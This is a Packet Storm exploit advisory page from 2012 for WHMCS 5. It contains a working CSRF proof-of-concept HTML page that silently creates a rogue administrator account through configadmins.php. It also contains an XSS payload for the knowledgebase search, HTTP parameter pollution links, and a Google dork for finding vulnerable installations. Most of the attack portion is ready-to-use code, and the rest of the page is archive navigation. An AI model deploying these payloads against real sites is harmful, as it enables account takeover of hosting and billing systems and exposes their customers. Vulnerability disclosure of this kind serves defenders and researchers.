exploit the possibilities

WHMCS 5 Cross Site Request Forgery / Cross Site Scripting

WHMCS 5 Cross Site Request Forgery / Cross Site Scripting
Posted May 30, 2012
Authored by Shadman Tanjim

WHMCS version5 suffers from cross site request forgery, HTTP parameter pollution, and cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss, csrf
MD5 | 2872ea8a1a3ad234439140a1fa613b38

WHMCS 5 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
##########################################################################################################################
# Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
# Version: Latest version 5.1 and other previous version maybe vulnerable
# Vendor: www.whmcs.com
# Date: 2012-05-30
# Tested on: win/linux
# Author/Found by: Shadman Tanjim
# Email: shadman2600@gmail.com
# Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
# Special Thanks: x8631p
# Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
############################################################################################################################

CSRF Vulnerability:

Get:
http://site.com/clientarea.php
http://site.com/admin/index.php
http://site.com/admin/login.php

Post:
http://site.com/admin/login.php
http://site.com/cart.php
http://site.com/admin/configadmins.php
http://site.com/pwreset.php


p0c:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<h2>WHMCS CSRF ExpL0iT PoC</h2>
</head>
<script language="javascript" type="text/javascript" >

function lifeissimple() {

var token = "Token Value";

var img = document.createElement("img");
var site="http://www.localhost.com:80";
var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token + "&roleid=1&firstname=dead&lastname=cow&email=deadcow@deadcow.com&username=deadcow&password=deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English";
img.setAttribute("src", requesturl);
document.body.appendChild(img);

var img2 = document.createElement("img");
img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");
document.body.appendChild(img);
}

</script>
<body onload="lifeissimple();">

</body>
</html>


Cross-site Scripting (XSS) Vulnerability:

request:POST http://site.com/knowledgebase.php?action=search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

search='%20onerror%3D'f(PSRyh)


HTTP Parameter Pollution :

1.Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636
Affected parameter: a=add

2. Affected link: http://site.com/domainchecker.php?search=bulkregister&n946774=v992350
Affected parameter: search=bulkregister

3. Affected link: http://site.com/cart.php?currency=2&gid=1&n972751=v976696
Affected parameter: currency=2

Login or Register to add favorites

File Archive:

February 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    33 Files
  • 2
    Feb 2nd
    30 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    8 Files
  • 5
    Feb 5th
    11 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    1 Files
  • 8
    Feb 8th
    37 Files
  • 9
    Feb 9th
    15 Files
  • 10
    Feb 10th
    11 Files
  • 11
    Feb 11th
    26 Files
  • 12
    Feb 12th
    8 Files
  • 13
    Feb 13th
    1 Files
  • 14
    Feb 14th
    1 Files
  • 15
    Feb 15th
    9 Files
  • 16
    Feb 16th
    33 Files
  • 17
    Feb 17th
    6 Files
  • 18
    Feb 18th
    10 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    1 Files
  • 21
    Feb 21st
    1 Files
  • 22
    Feb 22nd
    17 Files
  • 23
    Feb 23rd
    15 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    28 Files
  • 26
    Feb 26th
    25 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close